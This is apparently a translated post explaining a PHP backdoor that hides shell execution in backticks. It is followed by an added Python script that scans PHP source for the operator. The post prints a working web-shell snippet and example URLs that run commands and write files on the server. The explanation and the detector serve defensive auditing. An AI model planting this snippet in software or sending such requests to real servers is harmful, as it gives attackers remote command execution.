Occasionally you see a piece of code that looks harmless but is actually a fatal backdoor. It relies on a character most PHP developers never pay attention to: the backtick (`). In PHP, a string wrapped in backticks is executed as a shell command, which is equivalent to calling shell_exec().
It is very well camouflaged and easy for an administrator to overlook.
$selfNums = $_GET['r'];
if (isset($selfNums)) {
    echo `$selfNums`;   // backticks, not single quotes
}
Just looking at this code, I think everyone would say there is no problem, but careful readers will notice that the variable in the echo is wrapped in a symbol. Since it is a variable, why wrap it at all?
And it is not a single quote; that is the key. The symbol is the one on the key below ESC (next to the exclamation mark, !).
With echo `system command`; you get the same effect as system().
If you don't believe it, you can test it yourself:
http://127.0.0.1/t.php?r=dir lists directories
http://127.0.0.1/t.php?r=echo I'm Ma >>d:\web\90sec.php
I used AppServ with a virtual host and tested it successfully.
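As an added example (not from the original post), here is a small audit script that scans PHP source for the backtick execution operator, skipping string literals and comments so that a backtick inside 'quotes' or a /* comment */ does not trigger a false alarm. It assumes the files use the long <?php tag and no heredoc/nowdoc blocks; the sample PHP is constructed for the demonstration.

```python
"""Audit PHP source for the backtick execution operator (`...`), which runs
its contents as a shell command just like shell_exec(). Strings and
comments are skipped; heredoc/nowdoc and short <?= tags are not handled
(assumed absent in the files being audited)."""

def find_backtick_exec(php_src):
    """Return [(line_number, snippet), ...] for each backtick-execution
    expression found in PHP code outside string literals and comments."""
    findings, i, n, line, in_php = [], 0, len(php_src), 1, False
    while i < n:
        c = php_src[i]
        if c == "\n":
            line, i = line + 1, i + 1
        elif not in_php:                      # plain HTML until <?php
            in_php = php_src.startswith("<?php", i)
            i += 5 if in_php else 1
        elif php_src.startswith("?>", i):     # back to HTML
            in_php, i = False, i + 2
        elif c in ("'", '"'):                 # string literal, honour \ escapes
            j = i + 1
            while j < n and php_src[j] != c:
                j += 2 if php_src[j] == "\\" else 1
            line, i = line + php_src.count("\n", i, j), j + 1
        elif c == "#" or php_src.startswith("//", i):   # line comment
            j = php_src.find("\n", i)
            i = n if j == -1 else j
        elif php_src.startswith("/*", i):     # block comment
            j = php_src.find("*/", i + 2)
            j = n if j == -1 else j + 2
            line, i = line + php_src.count("\n", i, j), j
        elif c == "`":                        # execution operator: record it
            j = php_src.find("`", i + 1)
            j = n - 1 if j == -1 else j
            findings.append((line, php_src[i:j + 1]))
            line, i = line + php_src.count("\n", i, j), j + 1
        else:
            i += 1
    return findings
# Constructed sample: the backdoor from the post plus harmless look-alikes.
SAMPLE_PHP = r"""<?php
$selfNums = $_GET['r'];
if (isset($selfNums)) {
    echo `$selfNums`;   // reads like quotes, is shell execution
}
$safe = 'a `literal` inside a string';  # not executed
/* echo `commented out` */
"""

if __name__ == "__main__":
    for line_no, snippet in find_backtick_exec(SAMPLE_PHP):
        print(f"line {line_no}: {snippet}")   # prints: line 4: `$selfNums`
```

Run it over a web root (for example with os.walk over *.php files) and review every hit; legitimate uses of the operator in application code are rare enough that each one deserves a look.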